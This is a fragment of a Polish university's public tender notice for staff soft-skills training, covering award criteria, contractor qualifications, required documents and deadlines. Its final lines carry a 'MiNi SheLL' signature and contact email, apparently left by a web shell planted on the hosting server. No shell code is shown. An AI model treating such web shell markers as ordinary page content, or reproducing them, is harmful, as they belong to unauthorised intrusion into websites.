szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert został opisany w Rozdziale 17 SWZ. Punkty będą przyznawane wg następujących zasad 1% = 1 punkt. Maksymalna łączna liczba punktów, jaką może osiągnąć oferta, wynosi 100 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">45</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Konspekt szkolenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kwalifikacje zawodowe Trenerów [KT]</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Szkolenie dla kadry dydaktycznej UEK pn.: &#34;Autoprezentacja i komunikacja z wewnętrznym egzaminem przygotowanym przez Wykonawcę, sprawdzającym zdobyte umiejętności. Szczegółowy opis przedmiotu zamówienia zawarty jest w: załączniku nr 6 – Opis przedmiotu zamówienia – część 7 oraz załączniku nr 4 – wzór Umowy do Specyfikacji Warunków Zamówienia (SWZ). </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 11500,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert został opisany w Rozdziale 17 SWZ. Punkty będą przyznawane wg następujących zasad 1% = 1 punkt. Maksymalna łączna liczba punktów, jaką może osiągnąć oferta, wynosi 100 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">45</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Konspekt szkolenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kwalifikacje zawodowe Trenerów [KT]</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Szkolenie dla kadry dydaktycznej UEK pn.: &#34;Perswazyjne wystąpienia publiczne i prezentacje&#34; z wewnętrznym egzaminem przygotowanym przez Wykonawcę, sprawdzającym zdobyte umiejętności. Szczegółowy opis przedmiotu zamówienia zawarty jest w: załączniku nr 6 – Opis przedmiotu zamówienia – część 8 oraz załączniku nr 4 – wzór Umowy do Specyfikacji Warunków Zamówienia (SWZ). </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 31004,50 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert został opisany w Rozdziale 17 SWZ. Punkty będą przyznawane wg następujących zasad 1% = 1 punkt. Maksymalna łączna liczba punktów, jaką może osiągnąć oferta, wynosi 100 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">45</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Konspekt szkolenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kwalifikacje zawodowe Trenerów [KT]</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Część 1:<br/>Zdolności technicznej lub zawodowej - Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że:<br/>a)	w okresie ostatnich trzech (3) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie należycie wykonał (tj. zorganizował i przeprowadził), a w przypadku świadczeń okresowych lub ciągłych jest w trakcie realizacji, co najmniej trzy (3) usługi szkoleniowe dla dorosłych(szkolenia/warsztaty/zajęcia dydaktyczne), obejmujących swoim programem zagadnienia z zakresu komunikacji interpersonalnej;<br/>b)	dysponuje lub będzie dysponował osobami, które zostaną skierowane do wykonania przedmiotu zamówienia i będą wykonywać je osobiście, tj.: dwoma (2) trenerami, którzy zostaną skierowani do realizacji niniejszego zamówienia (szkoleń), a każdy z nich posiada:<br/>- co najmniej wykształcenie wyższe,<br/>- doświadczenie zawodowe obejmujące min. trzy (3) przeprowadzone usługi szkoleniowe (szkolenia/warsztaty/zajęcia dydaktyczne) obejmujące swoim programem zagadnienia z zakresu komunikacji interpersonalnej, skierowane do osób dorosłych, zrealizowane w okresie 3 lat przed upływem terminu składania ofert,<br/><br/>Część 2:<br/>Zdolności technicznej lub zawodowej - Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że:<br/>a)	w okresie ostatnich trzech (3) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie należycie wykonał (tj. zorganizował i przeprowadził), a w przypadku świadczeń okresowych lub ciągłych jest w trakcie realizacji, co najmniej trzy (3) usługi szkoleniowe dla dorosłych(szkolenia/warsztaty/zajęcia dydaktyczne), obejmujących swoim programem zagadnienia z zakresu negocjacji handlowych;<br/>b)	dysponuje lub będzie dysponował osobami, które zostaną skierowane do wykonania przedmiotu zamówienia i będą wykonywać je osobiście, tj.: dwoma (2) trenerami, którzy zostaną skierowani do realizacji zamówienia (szkoleń), a każdy z nich posiada:<br/>- co najmniej wykształcenie wyższe,<br/>- doświadczenie zawodowe obejmujące min. trzy (3) przeprowadzone usługi szkoleniowe(szkolenia/warsztaty/zajęcia dydaktyczne) obejmujące swoim programem zagadnienia z zakresu negocjacji handlowych, skierowane do osób dorosłych, zrealizowane w ciągu 3 lat przed upływem terminu składania ofert,<br/><br/>Część 3:<br/>Zdolności technicznej lub zawodowej - Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że:<br/>a)	w okresie ostatnich trzech (3) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie należycie wykonał (tj. zorganizował i przeprowadził), a w przypadku świadczeń okresowych lub ciągłych jest w trakcie realizacji, co najmniej trzy (3) usługi szkoleniowe dla dorosłych(szkolenia/warsztaty/zajęcia dydaktyczne), obejmujące swoim programem zagadnienia z zakresu efektywnej pracy pod presją czasu;<br/>b)	dysponuje lub będzie dysponował osobami, które zostaną skierowane do wykonania przedmiotu zamówienia i będą wykonywać je osobiście, tj.: dwoma (2) trenerami, którzy zostaną skierowani do realizacji zamówienia (szkoleń), a każdy z nich posiada:<br/>- co najmniej wykształcenie wyższe,<br/>- doświadczenie zawodowe obejmujące min. trzy (3) przeprowadzone usługi szkoleniowe (szkolenia/warsztaty/zajęcia dydaktyczne)obejmujących swoim programem zagadnienia z zakresu efektywnej pracy pod presją czasu, skierowane do osób dorosłych, zrealizowane w ciągu 3 lat przed upływem terminu składania ofert,<br/><br/>Część 4:<br/>Zdolności technicznej lub zawodowej - Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że:<br/>a)	w okresie ostatnich trzech (3) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie należycie wykonał (tj. zorganizował i przeprowadził), a w przypadku świadczeń okresowych lub ciągłych jest w trakcie realizacji, co najmniej trzy (3) usługi szkoleniowe dla dorosłych(szkolenia/warsztaty/zajęcia dydaktyczne), obejmujących swoim programem zagadnienia z zakresu treningu analitycznego myślenia i rozwiązywania problemów;<br/>b)	dysponuje lub będzie dysponował osobami, które zostaną skierowane do wykonania przedmiotu zamówienia i będą wykonywać je osobiście, tj.: dwoma (2) trenerami, którzy zostaną skierowani do realizacji zamówienia (szkoleń), a każdy z nich posiada:<br/> - co najmniej wykształcenie wyższe,<br/> - doświadczenie zawodowe obejmujące min. trzy (3) przeprowadzone usługi szkoleniowe(szkolenia/warsztaty/zajęcia dydaktyczne) obejmujące swoim, programem zagadnienia z zakresu treningu analitycznego myślenia i rozwiązywania problemów, skierowane do osób dorosłych, zrealizowane w ciągu 3 lat przed upływem terminu składania ofert,<br/><br/>Część 5:<br/>Zdolności technicznej lub zawodowej - Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że:<br/>a)	w okresie ostatnich trzech (3) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie należycie wykonał (tj. zorganizował i przeprowadził), a w przypadku świadczeń okresowych lub ciągłych jest w trakcie realizacji, co najmniej trzy (3) usługi szkoleniowe dla dorosłych(szkolenia/warsztaty/zajęcia dydaktyczne), obejmujących swoim programem zagadnienia z zakresu design thinking w praktyce biznesowej;<br/>b)	dysponuje lub będzie dysponował osobami, które zostaną skierowane do wykonania przedmiotu zamówienia i będą wykonywać je osobiście tj.: dwoma (2) trenerami, którzy zostaną skierowani do realizacji zamówienia (szkoleń), a każdy z nich posiada:<br/>- co najmniej wykształcenie wyższe,<br/>- doświadczenie zawodowe obejmujące min. trzy (3) przeprowadzone usługi szkoleniowe (szkolenia/warsztaty/zajęcia dydaktyczne) obejmujące swoim, programem zagadnienia z zakresu design thinking w praktyce biznesowej, skierowane do osób dorosłych, zrealizowane w ciągu 3 lat przed upływem terminu składania ofert,<br/><br/>Część 6:<br/>Zdolności technicznej lub zawodowej - Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że:<br/>a)	w okresie ostatnich trzech (3) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie należycie wykonał (tj. zorganizował i przeprowadził), a w przypadku świadczeń okresowych lub ciągłych jest w trakcie realizacji, co najmniej trzy (3) usługi szkoleniowe dla dorosłych(szkolenia/warsztaty/zajęcia dydaktyczne), obejmujących swoim programem zagadnienia z zakresu kompetencji społecznych w biznesie;<br/>b)	dysponuje lub będzie dysponował osobami, które zostaną skierowane do wykonania przedmiotu zamówienia i będą wykonywać je osobiście, tj.: dwoma (2) trenerami, którzy zostaną skierowani do realizacji zamówienia (szkoleń), a każdy z nich posiada:<br/>- co najmniej wykształcenie wyższe,<br/>- doświadczenie zawodowe obejmujące min. trzy (3) przeprowadzone usługi szkoleniowe (szkolenia/warsztaty/zajęcia dydaktyczne) obejmujące swoim, programem zagadnienia z zakresu kompetencji społecznych w biznesie, skierowane do osób dorosłych, zrealizowane w ciągu 3 lat przed upływem terminu składania ofert,<br/><br/>Część 7:<br/>Zdolności technicznej lub zawodowej - Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że:<br/>a)	w okresie ostatnich trzech (3) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie należycie wykonał (tj. zorganizował i przeprowadził), a w przypadku świadczeń okresowych lub ciągłych jest w trakcie realizacji, co najmniej trzy (3) usługi szkoleniowe dla dorosłych(szkolenia/warsztaty/zajęcia dydaktyczne), obejmujących swoim programem zagadnienia z zakresu autoprezentacji i komunikacji;<br/>b)	dysponuje lub będzie dysponował osobami, które zostaną skierowane do wykonania przedmiotu zamówienia i będą wykonywać je osobiście, tj.: dwoma (2) trenerami, którzy zostaną skierowani do realizacji zamówienia (szkoleń), a każdy z nich posiada:<br/>- co najmniej wykształcenie wyższe,<br/>- doświadczenie zawodowe obejmujące min. trzy (3) przeprowadzone usługi szkoleniowe (szkolenia/warsztaty/zajęcia dydaktyczne) obejmujące swoim, programem zagadnienia z zakresu autoprezentacji i komunikacji, skierowane do osób dorosłych, zrealizowane w ciągu 3 lat przed upływem terminu składania ofert,<br/><br/>Część 8:<br/>Zdolności technicznej lub zawodowej - Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że:<br/>a)	w okresie ostatnich trzech (3) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie należycie wykonał (tj. zorganizował i przeprowadził), a w przypadku świadczeń okresowych lub ciągłych jest w trakcie realizacji, co najmniej trzy (3) usługi szkoleniowe dla dorosłych(szkolenia/warsztaty/zajęcia dydaktyczne), obejmujących swoim programem zagadnienia z zakresu perswazyjnych wystąpień publicznych i prezentacji;<br/>b)	dysponuje lub będzie dysponował osobami, które zostaną skierowane do wykonania przedmiotu zamówienia i będą wykonywać je osobiście, tj.: dwoma (2) trenerami, którzy zostaną skierowani do realizacji zamówienia (szkoleń), a każdy z nich posiada:<br/> - co najmniej wykształcenie wyższe,<br/> - doświadczenie zawodowe obejmujące min. trzy (3) przeprowadzone usługi szkoleniowe (szkolenia/warsztaty/zajęcia dydaktyczne) obejmujące swoi, programem zagadnienia z zakresu perswazyjnych wystąpień publicznych i prezentacji, skierowane do osób dorosłych, zrealizowane w ciągu 3 lat przed upływem terminu składania ofert. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia podmiotowych środków dowodowych:<br/>W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego:<br/>Oświadczenia, o którym mowa w §3 rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. poz. 2415) – tj. oświadczenia o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy PZP, w zakresie podstaw wykluczenia, według wzoru stanowiącego załącznik nr 2 do SWZ;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia podmiotowych środków dowodowych:<br/>1. Wykaz usług - a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie.<br/>Dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy. W przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonanie powinny być wystawione w okresie ostatnich 3 miesięcy. <br/>Wykaz wraz z dowodami, muszą zawierać informacje potwierdzające spełnianie warunków udziału w postępowaniu w zakresie zdolności zawodowej Wykonawcy, zgodnie z pkt 9.1.4.lit. a, 9.1.8. lit. a, 9.1.12. lit. a, 9.1.16. lit. a, 9.1.20. lit. a, 9.1.24. lit. a, 9.1.24. lit. a, 9.1.28. lit. a, lub 9.1.32. lit. a SWZ - w zależności, której części zamówienia dotyczy.<br/>Wzór Wykazu usług stanowi załącznik nr 8 do SWZ.<br/>	<br/>2. Wykaz osób - skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.<br/>Wykaz osób musi zawierać informacje potwierdzające spełnianie warunków udziału w postępowaniu w zakresie zdolności technicznej Wykonawcy, zgodnie z pkt 9.1.4. lit. b, 9.1.8. lit. b, 9.1.12. lit. b, 9.1.16. lit. b, 9.1.20. lit. b, 9.1.24. lit. b, 9.1.24. lit. b, 9.1.28. lit. b, lub 9.1.32. lit. b SWZ - w zależności, której części zamówienia dotyczy.<br/>Wzór Wykazu osób stanowi Załącznik nr 7 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 6.1	Zamawiający żąda złożenia wraz z ofertą niżej wymienionego przedmiotowego środka dowodowego. Przedmiotowy środek dowodowy należy złożyć do każdej z części z osobna, w zależności na która część zamówienia będzie składana oferta.<br/>6.2	Na potwierdzenie, że oferowane przez Wykonawcę usługi spełniają określone przez Zamawiającego w załączniku nr 6 – opis przedmiotu zamówienia wymagania, cechy lub kryteria oraz spełniają cechy lub kryteria określone w opisie kryteriów oceny ofert w Roz. 17 SWZ, Zamawiający wymaga złożenia opisu Konspektu szkolenia.<br/>6.3	Konspekt szkolenia musi potwierdzać, że szkolenie zostało przygotowane zgodnie z wytycznymi i wymaganiami oraz metodami i założeniami określonymi przez Zamawiającego w Opisie przedmiotu zamówienia – załącznik nr 6 do SWZ.<br/>6.4	Konspekt szkolenia musi zawierać minimum 6 tysięcy znaków i maksimum 10 tysięcy znaków, w formacie: A-4, marginesy: 2,5 cm, czcionka: Times Roman, wielkość 12, format pliku: word, pdf. Konspekt szkolenia musi zostać podpisany przez osoby upoważnione do reprezentacji Wykonawcy.<br/>6.5	Zamawiający wymaga złożenia Konspektu szkolenia wraz z ofertą.<br/>6.6	Konspekt szkolenia będzie podlegał ocenie w ramach pozacenowego kryterium oceny ofert, pn „Konspekt szkolenia” [KS], a zasady i sposób jego oceny zostały opisane w Rozdziale 17 SWZ.<br/>6.7	Zgodnie z treścią art. 107 ust. 1 Pzp, jeżeli Zamawiający żąda złożenia przedmiotowych środków dowodowych, wykonawca składa je wraz z ofertą.<br/>6.8	W zakresie przedmiotowego środka dowodowego (tj. opisu konspektu szkolenia), jeżeli Wykonawca nie złożył przedmiotowego środka dowodowego lub złożony przedmiotowy środek dowodowy jest niekompletny albo nie został przygotowany zgodnie z wymaganiami określonymi w SWZ, stosownie do art. 107 ust. 3 Pzp, przedmiotowy środek dowodowy(tj. opis konspektu szkolenia)–nie podlega uzupełnieniu. <br/>6.9	Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści przedmiotowego środka dowodowego. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawcy składają wypełniony i podpisany Formularz ofertowy - załącznik nr 5 do SWZ, a wraz z nim:<br/>1)	Oświadczenie Wykonawcy o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu (oświadczenie wstępne);<br/>2)	Oświadczenie o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu (oświadczenie wstępne) dotyczące podmiotu udostępniającego zasoby – jeżeli dotyczy;<br/>3)	Przedmiotowy środek dowodowy (tj. opis konspektu szkolenia) – przygotowany zgodnie z treścią Rozdziału 6 SWZ. W zależności na którą cześć jest składana oferta.<br/>4)	Zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów (jeżeli dotyczy) – propozycja zobowiązania stanowi zał. nr 3 do SWZ;<br/>5)	Pełnomocnictwo jeżeli oferta będzie podpisana przez pełnomocnika. Pełnomocnictwo wymagane jest również w przypadku Wykonawców wspólnie ubiegających się o zamówienie (np. spółki cywilnej, konsorcjum). <br/>6)	Oświadczenie Wykonawcy/ów wspólnie ubiegających się o udzielenie zamówienia, z którego wynika, jakie usługi wykonają poszczególni Wykonawcy (jeżeli dotyczy) – propozycja wzoru oświadczenia stanowi załącznik nr 1a do SWZ. <br/><br/>Uwaga:<br/>Pisemne zobowiązanie podmiotów wraz z dokumentami, o których mowa powyżej, wymagane jest w przypadkach w skazanych w 9.2 SWZ, tj. jeżeli Wykonawca, wykazując spełnianie warunków, udziału w postępowaniu polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 118 ustawy PZP. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Powyższe wymagania zostały określone w Rozdziale 9.2. i 10. SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> Zamawiający temat zaliczek uregulował w par 7 ust. 9-29 wzoru umowy. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> W par. 12 wzoru umowy (stanowiącym załącznik nr 4 do SWZ) określony został rodzaj, zakres<br/>oraz warunki wprowadzenia zmian w umowie. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-02-15 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Platformy Zakupowej Logintrade.Net. Wykonawca składa ofertę na Platformie Zakupowej Logintrade.Net Adres strony internetowej na której jest prowadzone postępowanie i na której będą dostępne wszelkie dokumenty związane z prowadzonym postępowaniem: https://uek-krakow.logintrade.net/rejestracja/oplatformie.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-02-15 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Stosownie do art. 95 ustawy Pzp, Zamawiający wymaga, aby w trakcie realizacji zamówienia<br/>Wykonawca lub podwykonawca, jeżeli dany zakres zamówienia powierzono do wykonania<br/>podwykonawcy, zatrudniał na potrzeby realizacji zamówienia (osoby wykonujące wskazane w<br/>umowie czynności) - na podstawie umowy o pracę w rozumieniu przepisów ustawy z dnia 26<br/>czerwca 1974 r. - Kodeks pracy (t.j. Dz. U. z 2020 r. poz. 1320). Powyższy wymóg zawarty jest<br/>w treści wzoru umowy, który stanowi załącznik nr 4 do SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com